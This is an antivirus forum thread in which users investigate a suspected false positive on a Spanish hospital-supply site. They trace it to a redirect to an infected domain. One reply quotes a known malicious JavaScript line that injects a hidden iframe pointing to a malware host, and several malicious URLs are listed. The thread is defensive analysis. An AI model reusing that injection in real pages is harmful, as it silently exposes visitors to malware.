url false postive

[isfere]

 URL http://www.lineamedicahospitalaria.es/clasificaciones.aspx?IdC=C3&Id=18

http://www.lineamedicahospitalaria.es   is a good site.

Detected some kind of trojan.

thksn

[Asyn]

You can report a possible FP here: http://www.avast.com/contact-form.php?loadStyles

Report    2011-08-11 01:48:00 (GMT 1)
Website    lineamedicahospitalaria.es
Domain Hash    6d9aa04ce3e59c5547e1d0a8f0f31aa7
IP Address    216.245.208.130 [SCAN]
IP Hostname    wnhsolar2.winnethost.us
IP Country    US (United States)
AS Number    46475
AS Name    LIMESTONENETWORKS - Limestone Networks, Inc.
Detections    0 / 23 (0 %)
Status    CLEAN

Report    2011-08-11 08:23:09 (GMT 1)
IP Address    216.245.208.130
IP Hostname    wnhsolar2.winnethost.us
IP Country    US
AS Number    N/A
AS Name    N/A
Detections    0 / 26 (0 %)
Status    CLEAN

[polonus]

See a report here: http://urlquery.net/report.php?id=1565
See the report here: http://wepawet.cs.ucsb.edu/view.php?hash=894c71ec08d2b2c85572231b9846182d&t=1313069947&type=js

No zeroiframes detected!
Check took 5.28 seconds

(Level: 0) Url checked:
-http://www.lineamedicahospitalaria.es/
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//webresource.axd?d=6qe_vmeilcewdagf7eyu0ghk92qf5wf3psuhwpr39i-ymqm7mpodwmxd9u27cfvv8xjftiugpdq9lhm1ijtbc2cfozc1&t=634445528553043750
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=zhnl9vw3rnapmh0jaduul7yfxlk_57vxxubtbtxk7ylonuialy5v_xu6zxvv8nr38zgni_8oocs-jtvwzxdh9ntqqifs0vpy9a2kcxypdoa4yj7n0qqrs1ypdiml5miikw_fya2&t=ffffffffce71825b
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=aiuzvw7wolarf3qdjgfwvy833ahsi6-fmlg-bei8srst3epmrih_iz66rz8r6flpn_gvs2iabkjjrm08-ukfpmxk4jyce5zxtzrlzqrprhhobhdbq6807xqenzjzighs9ile1fvx58jhc8xrjm4tgdouhti1&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
-http://www.lineamedicahospitalaria.es//scriptresource.axd?d=96d7y8rf2hp8taae1kn84jprsj3li1bonvux_kvjcqzqw-xwuap0pjg5nvt5mwgcvzn8bzhfmpwkisomvk8g_m8-kfn2ymyiystrjgukydanufmicru9xnjcxqboqqxzcl-dxw6rbkkldtckgmzelbgc0cvlgb39dj0z9kt3jzve4nan0&t=ffffffffd6ab16ef
Blank page / could not connect
No ad codes identified

polonus

[Sirmer]

Hello,
we are detecting there

jhkung.com

http://www.virustotal.com/url-scan/report.html?id=145832090628ce26879c0b843e5a45a0-1313068011

[polonus]

Yes, malware found in the url:
-http://jhgukn.com/ur.php
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjs3023
document.write("<iframe src='-http://frsskillnet.cu.cc/showthread.php?t=98761267' style='display:none;'></iframe>") blocked by the avast Network Shield as URL:Mal
but I get a 404. Page not found for the site you mention. But it definitely was infected on 2011-08-10, see: http://www.google.com/safebrowsing/diagnostic?site=jhgukn.com/ur.php
lot of malicious url's and badware and current events here reported, see:
http://sitevet.com/db/asn/AS43134 & http://www.google.com/safebrowsing/diagnostic?site=AS:43134

polonus

[iroc9555]

Hi guys.

I help in the Non-English forum, and I asked the OP to post the URL here because my Avast6.0.1203 did not detected anything and Virus Total came out clean when I scanned the URL yesterday, wierd that now it is detected.

He is running Avast 4 and he said that he could enter in the URL with the work PC but not at his home (both machines run Avast)(work PC runs McAfee).

He posted a screenshot of the warning:

 http://forum.avast.com/index.php?topic=82882.msg676826#msg676826

I adviced him to check his PC for infection since he has a temp file that is making some kind of redirect to jhgukn.com/ur.php and that is what Avast is detecting. What else can I tell him ?

Thanks.

Added: When he tries to go to:

hXXp://www.lineamedicahospitalaria.es/clasificaciones.aspx?IdC=C3&Id=18

He gets redirected to  jhgukn.com/ur.php and that is infected

[isfere]

thkns iroc9555

Thanks for making the explanation for my

[polonus]

Hi iroc9555,

Thanks for explaining the redirect to the initial poster. Good we all are protected by the avast shields,

polonus

[isfere]

Uploaded with ImageShack.us


malware antybytes free,

and my avast 4.8 my web shield is 4.8.

http://www.lineamedicahospitalaria.es  is good, but when yo want go to other section

example "antisepticos"
thanks fot everybody by their time.

[YoKenny]

malware antybytes free,

and my avast 4.8 my web shield is 4.8.

It seems you are running Malwarebytes Pro from your image

Why are you not running avast 6.0.1203 

[Lisandro]

Please, upload (attach) the avast log:
C:\ProgramData\AVAST Software\Avast\log\Setup.log
or C:\Program Files\Alwil Software\Avast5\Setup\setup.log

If the file is too big for the forum, post the last 400-500 lines of it.

[isfere]

http://xxx.megaupload.com/?d=O8IECRBB

in this link i have just upload, that log.

thkns.